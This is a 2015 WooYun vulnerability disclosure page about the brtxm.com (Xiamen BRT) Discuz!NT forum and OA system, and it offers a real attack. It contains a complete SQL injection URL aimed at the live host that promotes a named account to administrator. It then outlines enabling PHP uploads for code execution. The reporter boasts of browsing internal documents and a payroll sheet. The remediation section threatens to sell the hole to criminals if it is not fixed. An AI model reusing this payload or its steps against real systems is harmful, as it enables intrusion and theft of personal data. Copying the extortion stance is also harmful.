当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0131070
漏洞标题:
厦门快速公交论坛存在漏洞拿下oa/bbs控制权
相关厂商:
brtxm.com
漏洞作者:
赐给我个漂亮的女朋友
提交时间:
2015-08-03 11:06
修复时间:
2015-09-17 11:08
公开时间:
2015-09-17 11:08
漏洞类型:
文件上传导致任意代码执行
危害等级:
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-08-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

各种OA文档资料,项目资料,简历,辞职啥的,国税缴交啊等!

详细说明:

1.png


转到BBS

2.png


Powered by Discuz!NT
存在SQL注入漏洞
例:http://wooyun.org/bugs/wooyun-2010-04477
将自己提升为管理员

http://www.brtxm.com:8888/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27qwezxcasd%27%27%27%29--


3.png


成功
转而进入后台
修改附件格式
添加PHP
然后你懂的

6.png


7.png


8.png


无意间看到一份2010年的工资单
这也太少了吧

9.png


漏洞证明:

1.png


转到BBS

2.png


Powered by Discuz!NT
存在SQL注入漏洞
例:http://wooyun.org/bugs/wooyun-2010-04477
将自己提升为管理员

http://www.brtxm.com:8888/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27qwezxcasd%27%27%27%29--


3.png


成功
转而进入后台
修改附件格式
添加PHP
然后你懂的

6.png


7.png


8.png


无意间看到一份2010年的工资单
这也太少了吧

9.png


修复方案:

不知,过几天不修复就卖给黑产

版权声明:转载请注明来源 赐给我个漂亮的女朋友@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)